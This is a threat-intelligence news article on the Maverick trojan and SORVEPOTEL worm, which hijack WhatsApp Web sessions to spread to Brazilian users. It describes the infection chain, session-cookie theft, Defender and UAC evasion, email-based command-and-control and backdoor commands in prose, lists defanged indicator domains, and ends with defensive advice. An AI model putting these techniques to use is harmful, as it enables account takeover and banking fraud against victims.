Maverick Trojan Spreading via WhatsApp Web Hijacks Accounts to Target Brazil
Researchers have uncovered a link between the well-known banking trojan Coyote and the newly identified malware Maverick, which had been propagating through WhatsApp. Analysts highlight striking overlaps in the use of the .NET platform, shared functionality, and infection techniques — all of which point to a common origin and a shared cybercriminal ecosystem operating in Brazil.
Maverick was first reported by Trend Micro, who associated it with the Water Saci threat group. The campaign consists of two primary components: the self-propagating SORVEPOTEL module, spread through the web version of WhatsApp, and a ZIP archive containing Maverick’s main executable, which deploys the malicious payload on the victim’s device. Sophos and Kaspersky later conducted independent analyses. Sophos suggested Maverick is an evolution of Coyote, while Kaspersky confirmed overlapping code fragments but classified Maverick as a distinct malware family designed for large-scale attacks targeting Brazilian users.
A new report from CyberProof reveals additional technical details of the infection chain. Inside the ZIP archive lies a Windows LNK shortcut. When executed, it invokes cmd.exe or PowerShell to download the initial stage from a remote server — referenced in the publication as zapgrande[.]com. The PowerShell script then deploys intermediary tools, disables Microsoft Defender, bypasses User Account Control (UAC), and downloads a .NET loader. The loader checks for analysis tools and exits if a debugger is detected, before retrieving both SORVEPOTEL and Maverick.
A notable feature is its geographic filtering: Maverick installs itself only after confirming that the compromised system is located in Brazil. The malware verifies timezone, interface language, regional settings, and date format. CyberProof also observed the same infrastructure being used in attacks on hotel networks, suggesting an expansion of the campaign’s target set.
As part of Water Saci’s updated tactics, described in detail by Trend Micro, the actors abandoned .NET binaries in favor of a combination of VBScript and PowerShell. This toolkit allows them to hijack WhatsApp Web sessions and distribute infected ZIP archives to a victim’s entire contact list. To automate the browser, the attackers download ChromeDriver and employ Selenium, enabling them to mimic user behavior, manipulate profiles, and send messages.
The compromise typically begins with unpacking a ZIP archive containing the obfuscated VBS loader Orcamento.vbs — also known as SORVEPOTEL. This VBScript executes a PowerShell command that loads and runs the tadeu.ps1 script directly in memory. The script then modifies the Chrome profile: it terminates active processes, copies cookies, authentication tokens, and saved sessions into temporary storage, thereby granting the malware access to WhatsApp Web without requiring a new QR-code scan.
Having seized control of the session, the script distributes malicious ZIP archives to all contacts, simultaneously receiving message templates from its C2 server. To conceal its activity, it displays a fake window labelled “WhatsApp Automation v6.0”, creating the illusion of a legitimate process. Before sending each message, PowerShell personalizes the greeting by inserting the contact’s name and adjusting it to the time of day; a dynamic “pause” signal allows operators to regulate activity in real time.
SORVEPOTEL uses an unusual communication channel: instead of standard HTTP, it relies on IMAP. The backdoor connects to a mailbox on terra.com[.]br with built-in credentials and reads commands from incoming emails. Some accounts are protected by MFA, forcing operators to manually enter authentication codes. This slows operations but significantly improves stealth. After retrieving a new C2 URL, the malware routinely polls it and executes any received instructions.
The command set covers the full spectrum of post-exploitation capabilities: system information collection (INFO), shell command execution via cmd.exe (CMD) or PowerShell (POWERSHELL), screenshot capture (SCREENSHOT), process listing (TASKLIST) and termination (KILL), and comprehensive file and directory operations (LIST_FILES, DOWNLOAD_FILE, UPLOAD_FILE, DELETE, RENAME, COPY, MOVE, FILE_INFO, SEARCH, CREATE_FOLDER). Additional functions include rebooting (REBOOT), shutting down (SHUTDOWN), self-updating (UPDATE), and checking the mailbox for new C2 addresses (CHECK_EMAIL).
The malware’s persistence and management framework also deserves attention: it uses multivector footholds within the system and a distributed C2 infrastructure. This enables operators to pause and resume the campaign at will, monitor compromised devices, and manage them as nodes in a botnet. According to Trend Micro, execution is limited to systems configured for the Portuguese language and region, minimizing detection outside the target zone.
The threat’s impact on Brazil is substantial: WhatsApp remains one of the country’s primary communication platforms, with more than 148 million active users. Mass distribution of ZIP archives via contact lists makes the campaign exceptionally contagious and inexpensive to conduct, especially given its use of stolen browser profiles to bypass authentication checks.
Experts recommend tightening controls on browser behavior and system scripting: monitor for unauthorized profile copying, block suspicious PowerShell and VBScript execution, restrict untrusted scripts through AppLocker or WDAC, and keep antivirus signatures up to date. It is also advisable to watch for unexpected activity on terra.com[.]br mailboxes and external domains such as zapgrande[.]com. Users should avoid opening ZIP files received in messages and remain alert to any unusual pop-ups in their browsers.
The correlation between Coyote and Maverick illustrates the continuing evolution of banking-trojan distribution tactics: attackers are shifting from conventional loaders to the exploitation of legitimate browser profiles and messaging platforms, thereby enhancing both stealth and operational efficiency. This shift demands that defenders refine their monitoring tools, expand automated analysis capabilities, and foster closer coordination between infrastructure operators and security vendors.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
